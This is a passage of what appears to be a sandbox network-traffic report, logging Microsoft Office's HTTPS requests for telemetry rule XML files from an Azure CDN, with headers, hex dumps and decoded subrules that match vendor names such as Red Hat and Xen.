                            2024-11-14 22:39:03 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 52 72 5d 5b 45 65 5d 5b 44 64 5d 20 5b 48 68 5d 5b 41 61 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120669" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <SR T="2" R="([Rr][Ee][Dd] [Hh][Aa][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                            Session IDSource IPSource PortDestination IPDestination Port
                            78192.168.2.45520613.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:39:03 UTC192OUTGET /rules/rule120670v0s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:39:03 UTC491INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:39:03 GMT
                            Content-Type: text/xml
                            Content-Length: 472
                            Connection: close
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                            ETag: "0x8DC582B91EAD002"
                            x-ms-request-id: 8514c3eb-001e-0082-0ba0-345880000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223903Z-1866b5c5fbbg6vdshC1DFW20h800000000hg0000000099hd
                            x-fd-int-roxy-purgeid: 0
                            X-Cache: TCP_HIT
                            X-Cache-Info: L1_T2
                            Accept-Ranges: bytes
                            2024-11-14 22:39:03 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120670" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                            Session IDSource IPSource PortDestination IPDestination Port
                            79192.168.2.45520713.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:39:03 UTC192OUTGET /rules/rule120671v0s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:39:04 UTC491INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:39:04 GMT
                            Content-Type: text/xml
                            Content-Length: 432
                            Connection: close
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:26:15 GMT
                            ETag: "0x8DC582BAABA2A10"
                            x-ms-request-id: 4f504748-101e-0079-0faf-365913000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223903Z-16547b76f7f7scqbhC1DFW0m5w0000000m00000000011ysd
                            x-fd-int-roxy-purgeid: 0
                            X-Cache-Info: L1_T2
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2024-11-14 22:39:04 UTC432INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 53 73 5d 5b 55 75 5d 5b 50 70 5d 5b 45 65 5d 5b 52 72 5d 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120671" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <SR T="2" R="^([Ss][Uu][Pp][Ee][Rr][Mm][Ii][Cc][Rr][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T


                            Session IDSource IPSource PortDestination IPDestination Port
                            80192.168.2.45520813.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:39:04 UTC192OUTGET /rules/rule120672v0s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:39:04 UTC470INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:39:04 GMT
                            Content-Type: text/xml
                            Content-Length: 475
                            Connection: close
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                            ETag: "0x8DC582BBA740822"
                            x-ms-request-id: 50ec53c4-601e-0070-35a1-34a0c9000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223904Z-r178fb8d765mr9nqhC1DFWs8m800000001c000000000numm
                            x-fd-int-roxy-purgeid: 0
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2024-11-14 22:39:04 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120672" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                            Session IDSource IPSource PortDestination IPDestination Port
                            81192.168.2.45521013.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:39:04 UTC192OUTGET /rules/rule120674v0s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:39:04 UTC491INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:39:04 GMT
                            Content-Type: text/xml
                            Content-Length: 474
                            Connection: close
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                            ETag: "0x8DC582BA4037B0D"
                            x-ms-request-id: 03bc4034-001e-00a2-3978-36d4d5000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223904Z-r178fb8d765mr9nqhC1DFWs8m800000001900000000147nv
                            x-fd-int-roxy-purgeid: 0
                            X-Cache: TCP_HIT
                            X-Cache-Info: L1_T2
                            Accept-Ranges: bytes
                            2024-11-14 22:39:04 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120674" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                            Session IDSource IPSource PortDestination IPDestination Port
                            82192.168.2.45520913.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:39:04 UTC192OUTGET /rules/rule120673v0s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:39:04 UTC491INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:39:04 GMT
                            Content-Type: text/xml
                            Content-Length: 427
                            Connection: close
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:26:31 GMT
                            ETag: "0x8DC582BB464F255"
                            x-ms-request-id: 28ec3a41-801e-00a0-70af-362196000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223904Z-16547b76f7fr4g8xhC1DFW9cqc0000000kd000000000pqx9
                            x-fd-int-roxy-purgeid: 0
                            X-Cache-Info: L1_T2
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2024-11-14 22:39:04 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 54 74 5d 5b 48 68 5d 5b 49 69 5d 5b 4e 6e 5d 5b 50 70 5d 5b 55 75 5d 5b 54 74 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120673" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <SR T="2" R="([Tt][Hh][Ii][Nn][Pp][Uu][Tt][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                            Session IDSource IPSource PortDestination IPDestination Port
                            83192.168.2.45521113.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:39:04 UTC192OUTGET /rules/rule120675v0s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:39:04 UTC491INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:39:04 GMT
                            Content-Type: text/xml
                            Content-Length: 419
                            Connection: close
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                            ETag: "0x8DC582BA6CF78C8"
                            x-ms-request-id: fa98855d-501e-0064-4540-361f54000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223904Z-16547b76f7fwvr5dhC1DFW2c940000000m4000000000qh5u
                            x-fd-int-roxy-purgeid: 0
                            X-Cache-Info: L1_T2
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2024-11-14 22:39:04 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 55 75 5d 5b 50 70 5d 5b 43 63 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 55 75 5d 5b 44 64 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120675" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <SR T="2" R="([Uu][Pp][Cc][Ll][Oo][Uu][Dd])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                            Session IDSource IPSource PortDestination IPDestination Port
                            84192.168.2.45521313.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:39:04 UTC192OUTGET /rules/rule120677v0s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:39:05 UTC491INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:39:04 GMT
                            Content-Type: text/xml
                            Content-Length: 405
                            Connection: close
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:25:37 GMT
                            ETag: "0x8DC582B942B6AFF"
                            x-ms-request-id: 2fad41a2-601e-000d-6d82-362618000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223904Z-r178fb8d765w8fzdhC1DFW8ep400000002zg000000013sq6
                            x-fd-int-roxy-purgeid: 0
                            X-Cache-Info: L1_T2
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2024-11-14 22:39:05 UTC405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5e 5b 58 78 5d 5b 45 65 5d 5b 4e 6e 5d 24 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120677" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <SR T="2" R="(^[Xx][Ee][Nn]$)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <


                            Session IDSource IPSource PortDestination IPDestination Port
                            85192.168.2.45521513.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:39:05 UTC192OUTGET /rules/rule120679v0s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:39:05 UTC491INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:39:05 GMT
                            Content-Type: text/xml
                            Content-Length: 174
                            Connection: close
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                            ETag: "0x8DC582B91D80E15"
                            x-ms-request-id: 9a469636-e01e-0099-33fe-35da8a000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223905Z-1866b5c5fbb4z978hC1DFW84sc00000000q0000000006nuv
                            x-fd-int-roxy-purgeid: 0
                            X-Cache: TCP_HIT
                            X-Cache-Info: L1_T2
                            Accept-Ranges: bytes
                            2024-11-14 22:39:05 UTC174INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120679" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> </S> <T> <S T="1" /> </T></R>


                            Session IDSource IPSource PortDestination IPDestination Port
                            86192.168.2.45521413.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:39:05 UTC192OUTGET /rules/rule120678v0s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:39:05 UTC491INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:39:05 GMT
                            Content-Type: text/xml
                            Content-Length: 468
                            Connection: close
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                            ETag: "0x8DC582BBA642BF4"
                            x-ms-request-id: 46cd4d21-b01e-0097-7b90-364f33000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223905Z-16547b76f7ftdm8dhC1DFWs13g0000000m6g00000000my3a
                            x-fd-int-roxy-purgeid: 0
                            X-Cache: TCP_HIT
                            X-Cache-Info: L1_T2
                            Accept-Ranges: bytes
                            2024-11-14 22:39:05 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120678" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                            Session IDSource IPSource PortDestination IPDestination Port
                            87192.168.2.45521613.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:39:05 UTC192OUTGET /rules/rule120680v0s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:39:05 UTC494INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:39:05 GMT
                            Content-Type: text/xml
                            Content-Length: 1952
                            Connection: close
                            Vary: Accept-Encoding
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                            ETag: "0x8DC582B956B0F3D"
                            x-ms-request-id: 31833cf5-a01e-0070-33a3-34573b000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223905Z-r178fb8d765skzg4hC1DFW090c00000001e0000000008cby
                            x-fd-int-roxy-purgeid: 0
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2024-11-14 22:39:05 UTC1952INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 31 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120680" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <SS T="1" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> <R T="2" R="120682" /> <F T="3"> <O T="LT"> <L>


                            Session IDSource IPSource PortDestination IPDestination Port
                            88192.168.2.45521213.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:39:05 UTC192OUTGET /rules/rule120676v0s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:39:05 UTC470INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:39:05 GMT
                            Content-Type: text/xml
                            Content-Length: 472
                            Connection: close
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                            ETag: "0x8DC582B984BF177"
                            x-ms-request-id: a176e845-e01e-0020-7fa1-34de90000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223905Z-1866b5c5fbb4z978hC1DFW84sc00000000ng00000000cerx
                            x-fd-int-roxy-purgeid: 0
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2024-11-14 22:39:05 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120676" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                            Session IDSource IPSource PortDestination IPDestination Port
                            89192.168.2.45521713.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:39:05 UTC192OUTGET /rules/rule120681v0s19.xml HTTP/1.1
